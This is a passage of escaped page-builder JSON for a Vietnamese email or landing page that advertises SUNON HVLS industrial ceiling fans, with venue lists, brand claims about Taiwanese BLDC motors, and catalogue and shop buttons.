ngh\\u1ecb<\\/li>\\\\n<\\/ul>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_19\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"gCMkWkSFMW\\\",\\\"contents\\\":[{\\\"id\\\":\\\"8fKv00um80\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<ul style=\\\\\\\"list-style-type: square;\\\\\\\">\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Nh\\u00e0 x\\u01b0\\u1edfng, kho h\\u00e0ng r\\u1ed9ng l\\u1edbn<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Nh\\u00e0 th\\u1edd, kh\\u00f4ng gian l\\u1edbn<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Trung t\\u00e2m Th\\u01b0\\u01a1ng m\\u1ea1i, Garage OTO<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Kho ch\\u1ee9a h\\u00e0ng, ph\\u00e2n ph\\u1ed1i<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">S\\u00e2n b\\u00f3ng,si\\u00eau th\\u1ecb, nh\\u00e0 h\\u00e1t<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Ph\\u00f2ng \\u0111\\u1ee3i s\\u00e2n bay, kh\\u00f4ng gian m\\u1edf<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">S\\u1ea3nh trung t\\u00e2m si\\u00eau th\\u1ecb b\\u00e1n l\\u1ebb<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Kh\\u00f4ng gian vui ch\\u01a1i gi\\u1ea3i tr\\u00ed<\\/li>\\\\n<\\/ul>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_16\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UIQ7UR6LrK\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ced4d9\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_9\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\\\\\">\\\\\\\"<\\/span><span style=\\\\\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\\\\\">S\\u1ea3n xu\\u1ea5t ch\\u1ea5t l\\u01b0\\u1ee3ng ti\\u00eau chu\\u1ea9n TAIWAN\\\\\\\"<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 22.4px; font-size: 16px;\\\\\\\">SUNON v\\u1edbi 40 n\\u0103m kinh nghi\\u1ec7m trong ng\\u00e0nh thi\\u1ebft k\\u1ebf &amp; s\\u1ea3n xu\\u1ea5t c\\u00f4ng ngh\\u1ec7 \\u0111\\u1ed9ng c\\u01a1 BLDC t\\u1ea1i Taiwan. V\\u00e0o n\\u0103m 2017, SUNON \\u0111\\u00e3 ra m\\u1eaft qu\\u1ea1t HVLS s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng DC (BLDC) kh\\u00f4ng ch\\u1ed5i than. B\\u1eb1ng t\\u00ednh to\\u00e1n kh\\u00ed \\u0111\\u1ed9ng l\\u1ef1c h\\u1ecdc \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng \\u0111\\u1ec3 t\\u1ed1i \\u01b0u h\\u00f3a lu\\u1ed3ng gi\\u00f3, cho ph\\u00e9p qu\\u1ea1t SUNON HVLS t\\u1ea1o ra lu\\u1ed3ng gi\\u00f3 l\\u1edbn v\\u1edbi t\\u1ed1c \\u0111\\u1ed9 quay th\\u1ea5p, \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c hi\\u1ec7u su\\u1ea5t t\\u1ed1i \\u01b0u m\\u00e0 qu\\u1ea1t HVLS kh\\u00e1c kh\\u00f4ng th\\u1ec3 \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"MhVCw2iioc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677163676213-cam-nhan-nhiet-do.jpg\\\",\\\"width\\\":600,\\\"height\\\":139},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Cabin\\\",\\\"value\\\":\\\"\'Cabin\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Cabin:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#048a3c\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS SUNON<br \\/><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Crimson Text\\\",\\\"value\\\":\\\"\'Crimson Text\',serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Crimson+Text:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\">Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c lo\\u1ea1i qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng s\\u1ea3n xu\\u1ea5t t\\u1ea1i China d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra c\\u00e1c lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u.\\u00a0<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/sunon.quatcaocap.com\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#3598db\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM E-CATALOGUE - SUNON (TAIWAN)<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":349,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Z4VToBS4B9\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"ch6yDS0JPN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"CtdZ0tZmlt\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"25px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8lC5UJCHc8\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296572547-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"n2PBpeWvwY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Thi\\u1ebft k\\u1ebf t\\u01b0 v\\u1ea5n gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t<br \\/>D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"Yqj5K-50GA\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 10px 50px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">S H O P\\u00a0 \\u00a0N O W<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":145,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"0px\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\",\\\"borderBottomStyle\\\":\\\"solid\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":285,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W\\u00a0 \\u00a0A L O N G\\u00a0 \\u00a0W I T H\\u00a0 \\u00a0U 